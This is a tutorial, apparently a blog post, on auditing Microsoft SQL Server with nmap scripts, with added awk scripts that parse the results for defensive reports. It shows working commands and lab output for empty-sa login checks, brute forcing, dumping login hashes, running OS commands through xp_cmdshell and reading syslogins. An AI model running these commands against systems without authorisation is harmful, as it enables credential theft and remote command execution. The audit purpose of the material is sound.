Control MS SQL Server security with nmap


Nmap ships with several NSE scripts for checking the security of a Microsoft SQL Server database. In this note I will show how you can audit your SQL Server with nmap.

Check sa account with null password

ms-sql-empty-password

Attempts to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

An example:

nmap -p 1433 --script ms-sql-empty-password 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:41 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00064s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-empty-password:
|   [192.200.11.11:1433]
|_    sa:<empty> => Login Success
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 17.5

If port 445 (the microsoft-ds service) is open, the same script can run as a host script; the mssql.instance-all argument makes it target every instance found through the SQL Server Browser service:

nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-all 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:44 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00059s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)

Host script results:
| ms-sql-empty-password:
|   [192.200.11.11:1433]
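The output above is easy to read for one host but not for a fleet. The following is an added example (not code from the post or from the nmap project) that reads nmap's normal output for a scan run with ms-sql-empty-password and reduces it to one finding line per instance that still accepts sa with an empty password, exiting non-zero so a scheduled audit can fail on it. The function name and the sample scan output are mine; the sample is constructed in the shape of the output shown in the post.

```shell
#!/bin/sh
# Added example, not from the original post or the nmap project.
# Input:  nmap normal output (-oN file, or stdin) for a scan that used
#         --script ms-sql-empty-password (as a port script or a host script).
# Output: one line per finding:  host:port login
# Exit:   1 if at least one finding, 0 otherwise.

# empty_sa_findings: read nmap output on stdin, print findings, exit 1 if any.
empty_sa_findings() {
    awk '
        # The ms-sql scripts print the instance they talk to as "[host:port]"
        # on its own line; remember it for the result lines that follow.
        /^[|][ _]*\[[^]]+\]$/ {
            inst = $0
            sub(/^[|][ _]*\[/, "", inst)
            sub(/\]$/, "", inst)
            next
        }
        # A finding looks like:  |_    sa:<empty> => Login Success
        # Anything else (Login Failure, no result, other scripts) is ignored.
        /^[|][ _]*[^ ]+:<empty> => Login Success$/ {
            login = $2
            sub(/:<empty>$/, "", login)
            print inst, login
            found = 1
        }
        END { exit (found ? 1 : 0) }
    '
}

# Constructed sample in the shape of the post's output: two hosts, one of
# them still accepting an empty sa password. Used only for the self-check.
SAMPLE_OUTPUT='Nmap scan report for 192.200.11.11
Host is up (0.00064s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-empty-password:
|   [192.200.11.11:1433]
|_    sa:<empty> => Login Success

Nmap scan report for 192.200.11.12
Host is up (0.00071s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-empty-password:
|   [192.200.11.12:1433]
|_    sa:<empty> => Login Failure

Nmap done: 2 IP addresses (2 hosts up) scanned in 3.12 seconds'

# Self-check on the constructed sample. For a real scan:
#   nmap -p 1433 --script ms-sql-empty-password -oN scan.txt <targets>
#   empty_sa_findings < scan.txt
if ! printf '%s\n' "$SAMPLE_OUTPUT" | empty_sa_findings; then
    echo "at least one instance accepts sa with an empty password" >&2
fi
```

Because the script keys on the `[host:port]` line rather than on the scan report header, it works unchanged for the host-script form on port 445 shown above, where the instance line is the only place the SQL port appears.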

Brute Force attacks

nmap -p1433 --script ms-sql-brute 192.200.11.11

Host is up, received arp-response (0.00064s latency).
Scanned at 2016-06-12 12:20:41 EDT for 157s
PORT     STATE SERVICE  REASON
1433/tcp open  ms-sql-s syn-ack ttl 128
| ms-sql-brute:
|   [192.200.11.11:1433]
|_    No credentials found
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Final times for host: srtt: 636 rttvar: 3138  to: 100000

Dumping the password hashes of an MS SQL server

If the sa password is null, the credentials that ms-sql-empty-password finds are reused by ms-sql-dump-hashes when both scripts run in the same scan:

nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:03 EDT
Nmap scan report for 192.200.11.11
Host is up (0.016s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-dump-hashes:
|   [192.200.11.11:1433]
|     sa:0x0200EC357FC5FA85256C4BC37667845B81E84C0F3CA9E7AD2BC7FB94FB698E5243FC5112C2B240884C44E71FD45195BB60B4AAF63D24B909C5945285793D0605E4D09E886849
|     ##MS_PolicyTsqlExecutionLogin##:0x0200251457811E7CB37A8C9746EC742325673A60D16B98DF182FCF7E4410A2FB1B03C36B2E60A68BB269C7D47B3C43F6CB485365CF5D171A48171B6DA6DB74CDEA40759E9DFC
|     ##MS_PolicyEventProcessingLogin##:0x0200F8A9BBBADB33E242C190EE82D15BB47564F46C5BF7B29B0124F32DCFF96837F9F243BD054F0A0D2B8D5C4D95F885B30EAA47F94F7FBBD3EA613DF64F05E14659742EB868
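The leading bytes of each dumped hash identify its format, which is the one thing a defender can act on from this output: 0x0100 is the SHA-1 based format used up to SQL Server 2008 R2, and 0x0200 is the SHA-512 based format used since SQL Server 2012 (2 bytes version, 4 bytes salt, 64 bytes digest, 140 hex digits). On an instance upgraded to 2012 or later, a login still carrying a 0x0100 hash has not had its password changed since the upgrade. The following added example (not code from the post or the nmap project) classifies the hashes by format; the function name is mine, the first two sample lines are the post's own output and the `legacy_app` line is constructed.

```shell
#!/bin/sh
# Added example, not from the original post or the nmap project.
# classify_hashes: read ms-sql-dump-hashes output on stdin and print
#   host:port login version description
# so the audit report says which logins need a password reset.
classify_hashes() {
    awk '
        # instance line, e.g. "|   [192.200.11.11:1433]"
        /^[|][ _]*\[[^]]+\]$/ {
            inst = $0
            sub(/^[|][ _]*\[/, "", inst)
            sub(/\]$/, "", inst)
            next
        }
        # hash line, e.g. "|     sa:0x0200EC35..."; split at the last ":0x"
        /^[|][ _]*[^ ].*:0x[0-9A-Fa-f]+$/ {
            line = $0
            sub(/^[|][ _]*/, "", line)
            n = match(line, /:0x[0-9A-Fa-f]+$/)
            login = substr(line, 1, n - 1)
            hash = substr(line, n + 1)
            ver = substr(hash, 3, 4)          # version bytes as hex: 0100 / 0200
            if (ver == "0200") {
                # 0x + 140 hex digits is the only well-formed length
                desc = (length(hash) == 142) ? "SHA-512" : "SHA-512 (unexpected length)"
            } else if (ver == "0100") {
                desc = "SHA-1 legacy format, reset password"
            } else {
                desc = "unknown format"
            }
            print inst, login, "0x" ver, desc
        }
    '
}

# Sample: the sa and policy-login lines are from the post; the legacy_app
# line is constructed (0x0100 + 4-byte salt + 20-byte digest, 54 characters).
SAMPLE_HASHES='| ms-sql-dump-hashes:
|   [192.200.11.11:1433]
|     sa:0x0200EC357FC5FA85256C4BC37667845B81E84C0F3CA9E7AD2BC7FB94FB698E5243FC5112C2B240884C44E71FD45195BB60B4AAF63D24B909C5945285793D0605E4D09E886849
|     ##MS_PolicyTsqlExecutionLogin##:0x0200251457811E7CB37A8C9746EC742325673A60D16B98DF182FCF7E4410A2FB1B03C36B2E60A68BB269C7D47B3C43F6CB485365CF5D171A48171B6DA6DB74CDEA40759E9DFC
|     legacy_app:0x01001234ABCDDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF'

# Self-check on the sample; for a real scan pipe the -oN file in instead.
printf '%s\n' "$SAMPLE_HASHES" | classify_hashes
```

Whatever the format, a dump like this means the instance's login hashes have left the server and every password in it should be rotated; the classification only tells you which ones were already overdue.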

Getting Information

Attempts to determine configuration and version information for Microsoft SQL Server instances. No credentials are required:

nmap -p1433-1900 --script ms-sql-info 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 11:55 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00096s latency).
Not shown: 467 closed ports
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)

Host script results:
| ms-sql-info:
|   192.200.11.11:1433:
|     Version:
|       number: 11.00.3128.00
|       Post-SP patches applied: true
|       Service pack level: SP1
|       Product: Microsoft SQL Server 2012
|       name: Microsoft SQL Server 2012 SP1+
|_    TCP port: 1433
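Because ms-sql-info needs no credentials, it is the cheapest way to keep an inventory of SQL Server builds and spot instances that have fallen behind the patch baseline. The following added example (not code from the post or the nmap project) pulls the `number:` line for every instance out of the scan output and compares it with a minimum build you supply; the function name is mine, the 192.200.11.12 instance and the baseline numbers in the self-check are constructed, and the real baseline has to come from the vendor's build list.

```shell
#!/bin/sh
# Added example, not from the original post or the nmap project.
# version_check MIN_BUILD: read ms-sql-info output on stdin and print
#   host:port build ok|BELOW-BASELINE
# for each instance; exit 1 if any instance is below MIN_BUILD.
version_check() {
    awk -v min="$1" '
        BEGIN { split(min, m, ".") }
        # instance header, e.g. "|   192.200.11.11:1433:"
        /^[|][ _]*[^ ]+:$/ && $2 != "Version:" && $2 != "ms-sql-info:" {
            inst = $2
            sub(/:$/, "", inst)
            next
        }
        # build number, e.g. "|       number: 11.00.3128.00"
        /^[|][ _]*number: / {
            ver = $NF
            split(ver, v, ".")
            status = "ok"
            # compare the four dotted fields numerically, most significant first
            for (i = 1; i <= 4; i++) {
                if (v[i] + 0 < m[i] + 0) { status = "BELOW-BASELINE"; bad = 1; break }
                if (v[i] + 0 > m[i] + 0) break
            }
            print inst, ver, status
        }
        END { exit (bad ? 1 : 0) }
    '
}

# Sample: the first instance is the post's own output; the second host and
# its build number are constructed.
SAMPLE_INFO='Host script results:
| ms-sql-info:
|   192.200.11.11:1433:
|     Version:
|       number: 11.00.3128.00
|       Post-SP patches applied: true
|       Service pack level: SP1
|       Product: Microsoft SQL Server 2012
|       name: Microsoft SQL Server 2012 SP1+
|_    TCP port: 1433

Nmap scan report for 192.200.11.12
| ms-sql-info:
|   192.200.11.12:1433:
|     Version:
|       number: 11.00.7001.00
|       Product: Microsoft SQL Server 2012
|_    TCP port: 1433'

# Self-check with a constructed baseline. For a real scan:
#   nmap -p 1433 --script ms-sql-info -oN scan.txt <targets>
#   version_check <minimum build from your patch baseline> < scan.txt
if ! printf '%s\n' "$SAMPLE_INFO" | version_check 11.00.5000.00; then
    echo "instances below the patch baseline found" >&2
fi
```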

Running command shell on MS SQL servers

To run the dir command on the Windows server when the sa account password is null:

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args 'mssql.username=sa,mssql.password="",ms-sql-xp-cmdshell.cmd="dir"' 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:38 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00046s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-xp-cmdshell:
|   [192.200.11.11:1433]
|     Command: dir
|     output
|     ======
|     Volume in drive C has no label.
|     Volume Serial Number is 1E1E-6DAB
|     Null
|     Directory of C:\Windows\system32
|     Null
|     19/06/2016 01:51 <DIR> .
|     19/06/2016 01:51 <DIR> ..
|     30/09/2013 16:44 <DIR> 0409
|     02/01/2016 12:33 <DIR> 1033
|     18/06/2013 07:48 160 @OpenWithToastLogo.png
|     18/06/2013 08:04 120 @TileEmpty1x1Image.png
|     22/08/2013 03:39 3,812,352 accessibilitycpl.dll
|     22/08/2013 04:45 39,424 ACCTRES.dll

Running SQL Query

Runs a query against Microsoft SQL Server (ms-sql).

nmap -p 1433 --script ms-sql-query --script-args 'mssql.username=sa,mssql.password="",ms-sql-query.query="SELECT * FROM syslogins"' 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 06:02 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00060s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-query:
|   [192.200.11.11:1433]
|     Query: SELECT * FROM syslogins
|     sid status createdate updatedate accdate totcpu totio spacelimit timelimit resultlimit name dbname password language denylogin hasaccess isntname isntgroup isntuser sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin loginname
|     === ====== ========== ========== ======= ====== ===== ========== ========= =========== ==== ====== ======== ======== ========= ========= ======== ========= ======== ======== ============= =========== ========== ============ ========= ========= ========= =========
|     0x01 9 Apr 08, 2003 14:10:35 Jun 12, 2016 14:50:31 Apr 08, 2003 14:10:35 0 0 0 00sa master \x02\xEC\x7F\xFA%Kv\x84\x81L<\xE7+\xFB\xFB\x8ECQ\xC2@L\xE7\xD4\x95`\xAA=\xB9\xC5Ry\x06\xE4\x9Eh us_english0 1 0 0 0 1 0 0 0 0 0 0 0 sa
|     0x0106000000000009010000005FB6DAC7F7DB546D706711B128B5063888B01770 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLResourceSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLResourceSigningCertificate##
|     0x010600000000000901000000A0B7FCD6F6D5FA771521910A3B71A750568D6275 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLReplicationSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLReplicationSigningCertificate##
|     0x010600000000000901000000C2FB1C6E4485BB1056EBC85FD2CC2AD081390316 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLAuthenticatorCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLAuthenticatorCertificate##
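The two sections above show why xp_cmdshell matters; the same ms-sql-query script can be turned into a configuration check that reports whether it is enabled. The following added example (not code from the post or the nmap project) builds a correctly quoted invocation (the whole --script-args value is one shell word, and the query is wrapped in NSE double quotes because it contains spaces and an = sign, following nmap's documented script-args quoting) and reduces the script's table output to one enabled/disabled line per instance. The query casts value_in_use to int so the script prints a plain 0 or 1. The function names and the MSSQL_USER / MSSQL_PASS / DRY_RUN variables are mine, not nmap arguments, and the sample output is constructed in the shape of the post's output.

```shell
#!/bin/sh
# Added example, not from the original post or the nmap project.
# Checks whether xp_cmdshell is enabled by querying sys.configurations
# through the ms-sql-query script, using an audit login supplied in the
# environment (MSSQL_USER, MSSQL_PASS) rather than the sa account.

XP_QUERY="SELECT CAST(value_in_use AS int) AS xp_cmdshell FROM sys.configurations WHERE name = 'xp_cmdshell'"

# run_xp_cmdshell_query TARGET: run the nmap command, or print it with DRY_RUN=1.
# Assumes nmap's script-args quoting rules: a value in double quotes may
# contain spaces, commas and = signs; the password is quoted for that reason.
run_xp_cmdshell_query() {
    target="$1"
    args="mssql.username=${MSSQL_USER:?MSSQL_USER must be set},mssql.password=\"${MSSQL_PASS?MSSQL_PASS must be set}\",ms-sql-query.query=\"$XP_QUERY\""
    if [ "${DRY_RUN:-0}" = "1" ]; then
        printf '%s\n' "nmap -p 1433 --script ms-sql-query --script-args $args $target"
    else
        nmap -p 1433 --script ms-sql-query --script-args "$args" "$target"
    fi
}

# xp_cmdshell_status: read ms-sql-query output on stdin and print
#   host:port xp_cmdshell enabled|disabled
xp_cmdshell_status() {
    awk '
        # instance line, e.g. "|   [192.200.11.11:1433]"
        /^[|][ _]*\[[^]]+\]$/ {
            inst = $0
            sub(/^[|][ _]*\[/, "", inst)
            sub(/\]$/, "", inst)
            in_rows = 0
            next
        }
        # The script prints the column names, then a row of ==== underlines,
        # then one row per result; only rows after the underline are data.
        /^[|][ _]*=+( +=+)*$/ { in_rows = 1; next }
        in_rows && /^[|][ _]*[01]$/ {
            print inst, "xp_cmdshell", ($2 == "1" ? "enabled" : "disabled")
        }
    '
}

# Constructed sample in the shape of the post's ms-sql-query output.
SAMPLE_QUERY="| ms-sql-query:
|   [192.200.11.11:1433]
|     Query: $XP_QUERY
|     xp_cmdshell
|     ===========
|_    1"

# Self-check on the sample. Against a live instance:
#   MSSQL_USER=auditor MSSQL_PASS='...' run_xp_cmdshell_query 192.200.11.11 | xp_cmdshell_status
printf '%s\n' "$SAMPLE_QUERY" | xp_cmdshell_status
```

A line ending in `enabled` means the instance would accept the xp_cmdshell example from the previous section from any login that holds sysadmin; `disabled` is the default on a fresh install and the state an audit should expect.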
